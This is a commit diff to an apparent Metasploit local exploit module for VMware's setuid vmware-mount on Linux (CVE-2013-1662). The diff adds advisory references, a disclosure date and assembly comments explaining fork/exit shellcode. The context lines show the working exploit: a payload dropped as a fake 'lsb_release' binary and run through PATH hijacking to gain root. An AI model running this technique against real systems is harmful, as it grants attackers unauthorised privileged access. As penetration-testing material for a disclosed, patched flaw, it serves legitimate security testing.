Add references and comments

jvazquez-r7 · jvazquez-r7 · commit e1e889131be8 · 2013-08-26T23:26:13.000-05:00
diff --git a/modules/exploits/linux/local/vmware_mount.rb b/modules/exploits/linux/local/vmware_mount.rb
@@ -40,10 +40,16 @@ def initialize(info={})
 					"PrependSetresuid" => true,
 					"PrependSetresgid" => true,
 				},
+				'Privileged'     => true,
 				'DefaultTarget' => 0,
 				'References' => [
-					[ 'URL', "http://blog.cmpxchg8b.com/2013/08/security-debianisms.html" ],
-				]
+					[ 'CVE', '2013-1662' ],
+					[ 'OSVDB', '96588' ],
+					[ 'BID', '61966'],
+					[ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
+					[ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ]
+				],
+				'DisclosureDate' => "Aug 22 2013"
 			}
 			))
 		# Handled by ghetto hardcoding below.
@@ -66,14 +72,23 @@ def exploit
 		# Ghetto PrependFork action which is apparently only implemented for
 		# Meterpreter.
 		# XXX Put this in a mixin somewhere
+		# if(fork()) exit(0);
+		# 6A02              push byte +0x2
+		# 58                pop eax
+		# CD80              int 0x80 ; fork
+		# 85C0              test eax,eax
+		# 7406              jz 0xf
+		# 31C0              xor eax,eax
+		# B001              mov al,0x1
+		# CD80              int 0x80 ; exit
 		exe = generate_payload_exe(
 			:code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded
 		)
 		write_file("lsb_release", exe)
 
 		cmd_exec("chmod +x lsb_release")
 		cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
-		cmd_exec("rm -f lsb_release")
+		cmd_exec("rm -f lsb_release") # using it over FileDropper because the original session can clean it up
 	end
 
 	def setuid?(remote_file)
